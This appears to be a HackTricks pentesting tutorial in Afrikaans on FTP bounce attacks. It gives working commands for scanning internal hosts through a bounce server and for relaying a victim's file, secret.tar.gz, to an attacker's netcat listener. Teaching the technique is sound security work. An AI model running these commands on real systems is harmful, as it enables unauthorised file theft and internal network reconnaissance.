FTP Bounce Aflaai 2 van FTP-lêer

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Opsomming

As jy toegang het tot ’n bounce FTP server, kan jy dit laat versoek lêers van ’n ander FTP server (waar jy ’n paar kredensiale ken) en daardie lêer na jou eie server aflaai.

Vereistes

• Geldige FTP-kredensiale op die FTP Middle server
• Geldige FTP-kredensiale op die Victim FTP server
• Beide servers aanvaar die PORT opdrag (bounce FTP attack)
• Jy kan skryf binne ’n gids op die FTP Middle server
• Die middle server het meer toegang binne die Victim FTP Server as jy

Stappe

1. Koppel aan jou eie FTP-server en plaas die verbinding in passive mode (pasv opdrag) sodat dit in ’n gids luister waar die Victim service die lêer sal stuur.
2. Skryf die lêer wat die FTP Middle server na die Victim server sal stuur (die exploit script). Hierdie lêer sal platte teks wees met die nodige opdragte om teen die Victim server te verifieer, die gids te verander en ’n lêer na jou eie server af te laai.
3. Koppel aan die FTP Middle Server en laai die vorige lêer op.
4. Laat die FTP Middle server ’n verbinding vestig met die Victim server en die exploit-lêer stuur.
5. Vang die lêer op jou eie FTP-server.
6. Verwyder die exploit-lêer vanaf die FTP Middle server.

Vinnige kontrole vir kwesbare bounce hosts

• Nmap ondersteun steeds FTP bounce kontroles. Voorbeeld om ’n potensiële middle server te verifieer:

nmap -Pn -p21 --script ftp-bounce <middle_ftp_ip>
# or directly attempt a bounce scan
nmap -Pn -p80 -b user:pass@<middle_ftp_ip>:21 <internal_target_ip>

As die bediener derde‑party PORT waardes weier sal die scan misluk; sommige ingebedde/verouderde drukkers, NAS en appliance FTP daemons laat dit steeds toe.

Automatisering van die tweede FTP-aflaai

Hieronder is ’n gemoderniseerde manier om ’n lêer deur ’n kwesbare middelste FTP-bediener te haal.

1. Open ’n passiewe luiser op jou aanvalsboks (enige TCP sink werk):

nc -lvnp 2121 > loot.bin  # or run a small pyftpdlib server

2. Neem kennis van jou IP as A,B,C,D en poort P as p1,p2 (p1 = P/256, p2 = P%256).

3. Bouw die instruksielêer wat die middelste bediener aan die slagoffer sal herhaal:

cat > instrs <<'EOF'
USER <victim_user>
PASS <victim_pass>
CWD /path/inside/victim
TYPE I
PORT A,B,C,D,p1,p2
RETR secret.tar.gz
QUIT
EOF
# Add padding so the control channel stays open on picky daemons
dd if=/dev/zero bs=1024 count=60 >> instrs

4. Laai op en trigger vanaf die middelste bediener (klassieke proxy FTP):

ftp -n <middle_ftp> <<'EOF'
user <middle_user> <middle_pass>
put instrs
PORT <victim_ip_with_commas>,0,21
RETR instrs
QUIT
EOF

5. Haal die lêer van jou luiser (loot.bin).
6. Maak skoon die opgelaaide instrs lêer op die middelste bediener.

Notas:

• Padding (dd ...) voorkom dat die beheerverbinding sluit voordat die RETR klaar is (groot TCP-venster kwessie bespreek in klassieke write-ups).
• Enige diens wat kan listen and dump TCP kan die FTP PASV-sok vervang (bv., socat -u TCP-LISTEN:2121,fork - > loot.bin).
• As die middelste bediener bevoorregte poorte beperk, gebruik ’n hoë poort in PORT en pas jou luiser ooreenkomstig aan.

Ekstra truuks

• Gebruik ’n bounceable FTP server om internale hosts te port-scan wanneer lêer-relay geblokkeer is:

nmap -Pn -p22,80,445 -b anonymous:<email>@<middle_ftp> <internal_ip>

• Sommige moderne WAF/IDS (bv., Juniper IPS) bevat signatures spesifiek vir FTP:EXPLOIT:BOUNCE-ATTACK; lawaaierige payloads of ontbrekende padding kan hulle laat afgaan.
• Wanneer die middelste bediener “PORT to same host” beperkings afdwing, plaas jou luiser op die middelste bediener self (as jy skryf/uitvoer het) en stuur die vasgevang lêer later deur.

Vir ’n meer gedetailleerde ou-skool stap-vir-stap gids, kyk: http://www.ouah.org/ftpbounce.html

References

• Nmap book – TCP FTP Bounce Scan (-b)
• CPTS Attacking Common Services – FTP Bounce example (2025)

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.